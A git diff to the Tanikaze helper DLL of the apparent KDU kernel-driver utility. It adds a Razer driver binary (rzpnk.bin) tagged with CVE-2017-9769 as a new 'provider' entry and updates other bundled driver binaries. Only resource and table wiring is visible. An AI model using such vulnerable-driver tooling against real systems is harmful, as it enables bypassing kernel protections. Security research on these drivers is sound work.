diff --git a/Source/Tanikaze/drv/procexp1627.bin b/Source/Tanikaze/drv/procexp1627.bin
index 75b14ed..5e3df8c 100644
Binary files a/Source/Tanikaze/drv/procexp1627.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
index 1b9a986..742815e 100644
Binary files a/Source/Tanikaze/drv/procexp1702.bin and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index e3515a0..add34f4 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/drv/rzpnk.bin b/Source/Tanikaze/drv/rzpnk.bin
new file mode 100644
index 0000000..29d8485
Binary files /dev/null and b/Source/Tanikaze/drv/rzpnk.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 3ddf7bc..cc5ea45 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -3,6 +3,7 @@
// Used by resource.rc
//
#define IDR_INTEL_NAL 103
+#define IDR_RZPNK 104
#define IDR_RTCORE64 105
#define IDR_GDRV 106
#define IDR_ATSZIO64 107
@@ -56,7 +57,7 @@
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 146
+#define _APS_NEXT_RESOURCE_VALUE 147
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 8cdb414..b322bad 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -148,6 +148,8 @@ IDR_IREC RCDATA "drv\\irec.bin"
IDR_PHYDMACC RCDATA "drv\\PhyDMACC.bin"
+IDR_RZPNK RCDATA "drv\\rzpnk.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 2e2c252..6305e51 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.17
+* VERSION: 1.18
*
-* DATE: 16 Sep 2023
+* DATE: 21 Oct 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -668,6 +668,21 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"PhyDMACC",
(LPWSTR)L"PhyDMACC_1_2_0",
(LPWSTR)L"Suzhou Ind. Park ShiSuanKeJi Co., Ltd."
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_RZPNK,
+ KDU_PROVIDER_RAZER,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_VICTIM | KDUPROV_FLAGS_OPENPROCESS_SUPPORTED,
+ KDUPROV_SC_NONE,
+ (LPWSTR)L"Razer Overlay Support driver CVE-2017-9769",
+ (LPWSTR)L"rzpnk",
+ (LPWSTR)L"47CD78C9-64C3-47C2-B80F-677B887CF095",
+ (LPWSTR)L"Razer USA Ltd."
}
};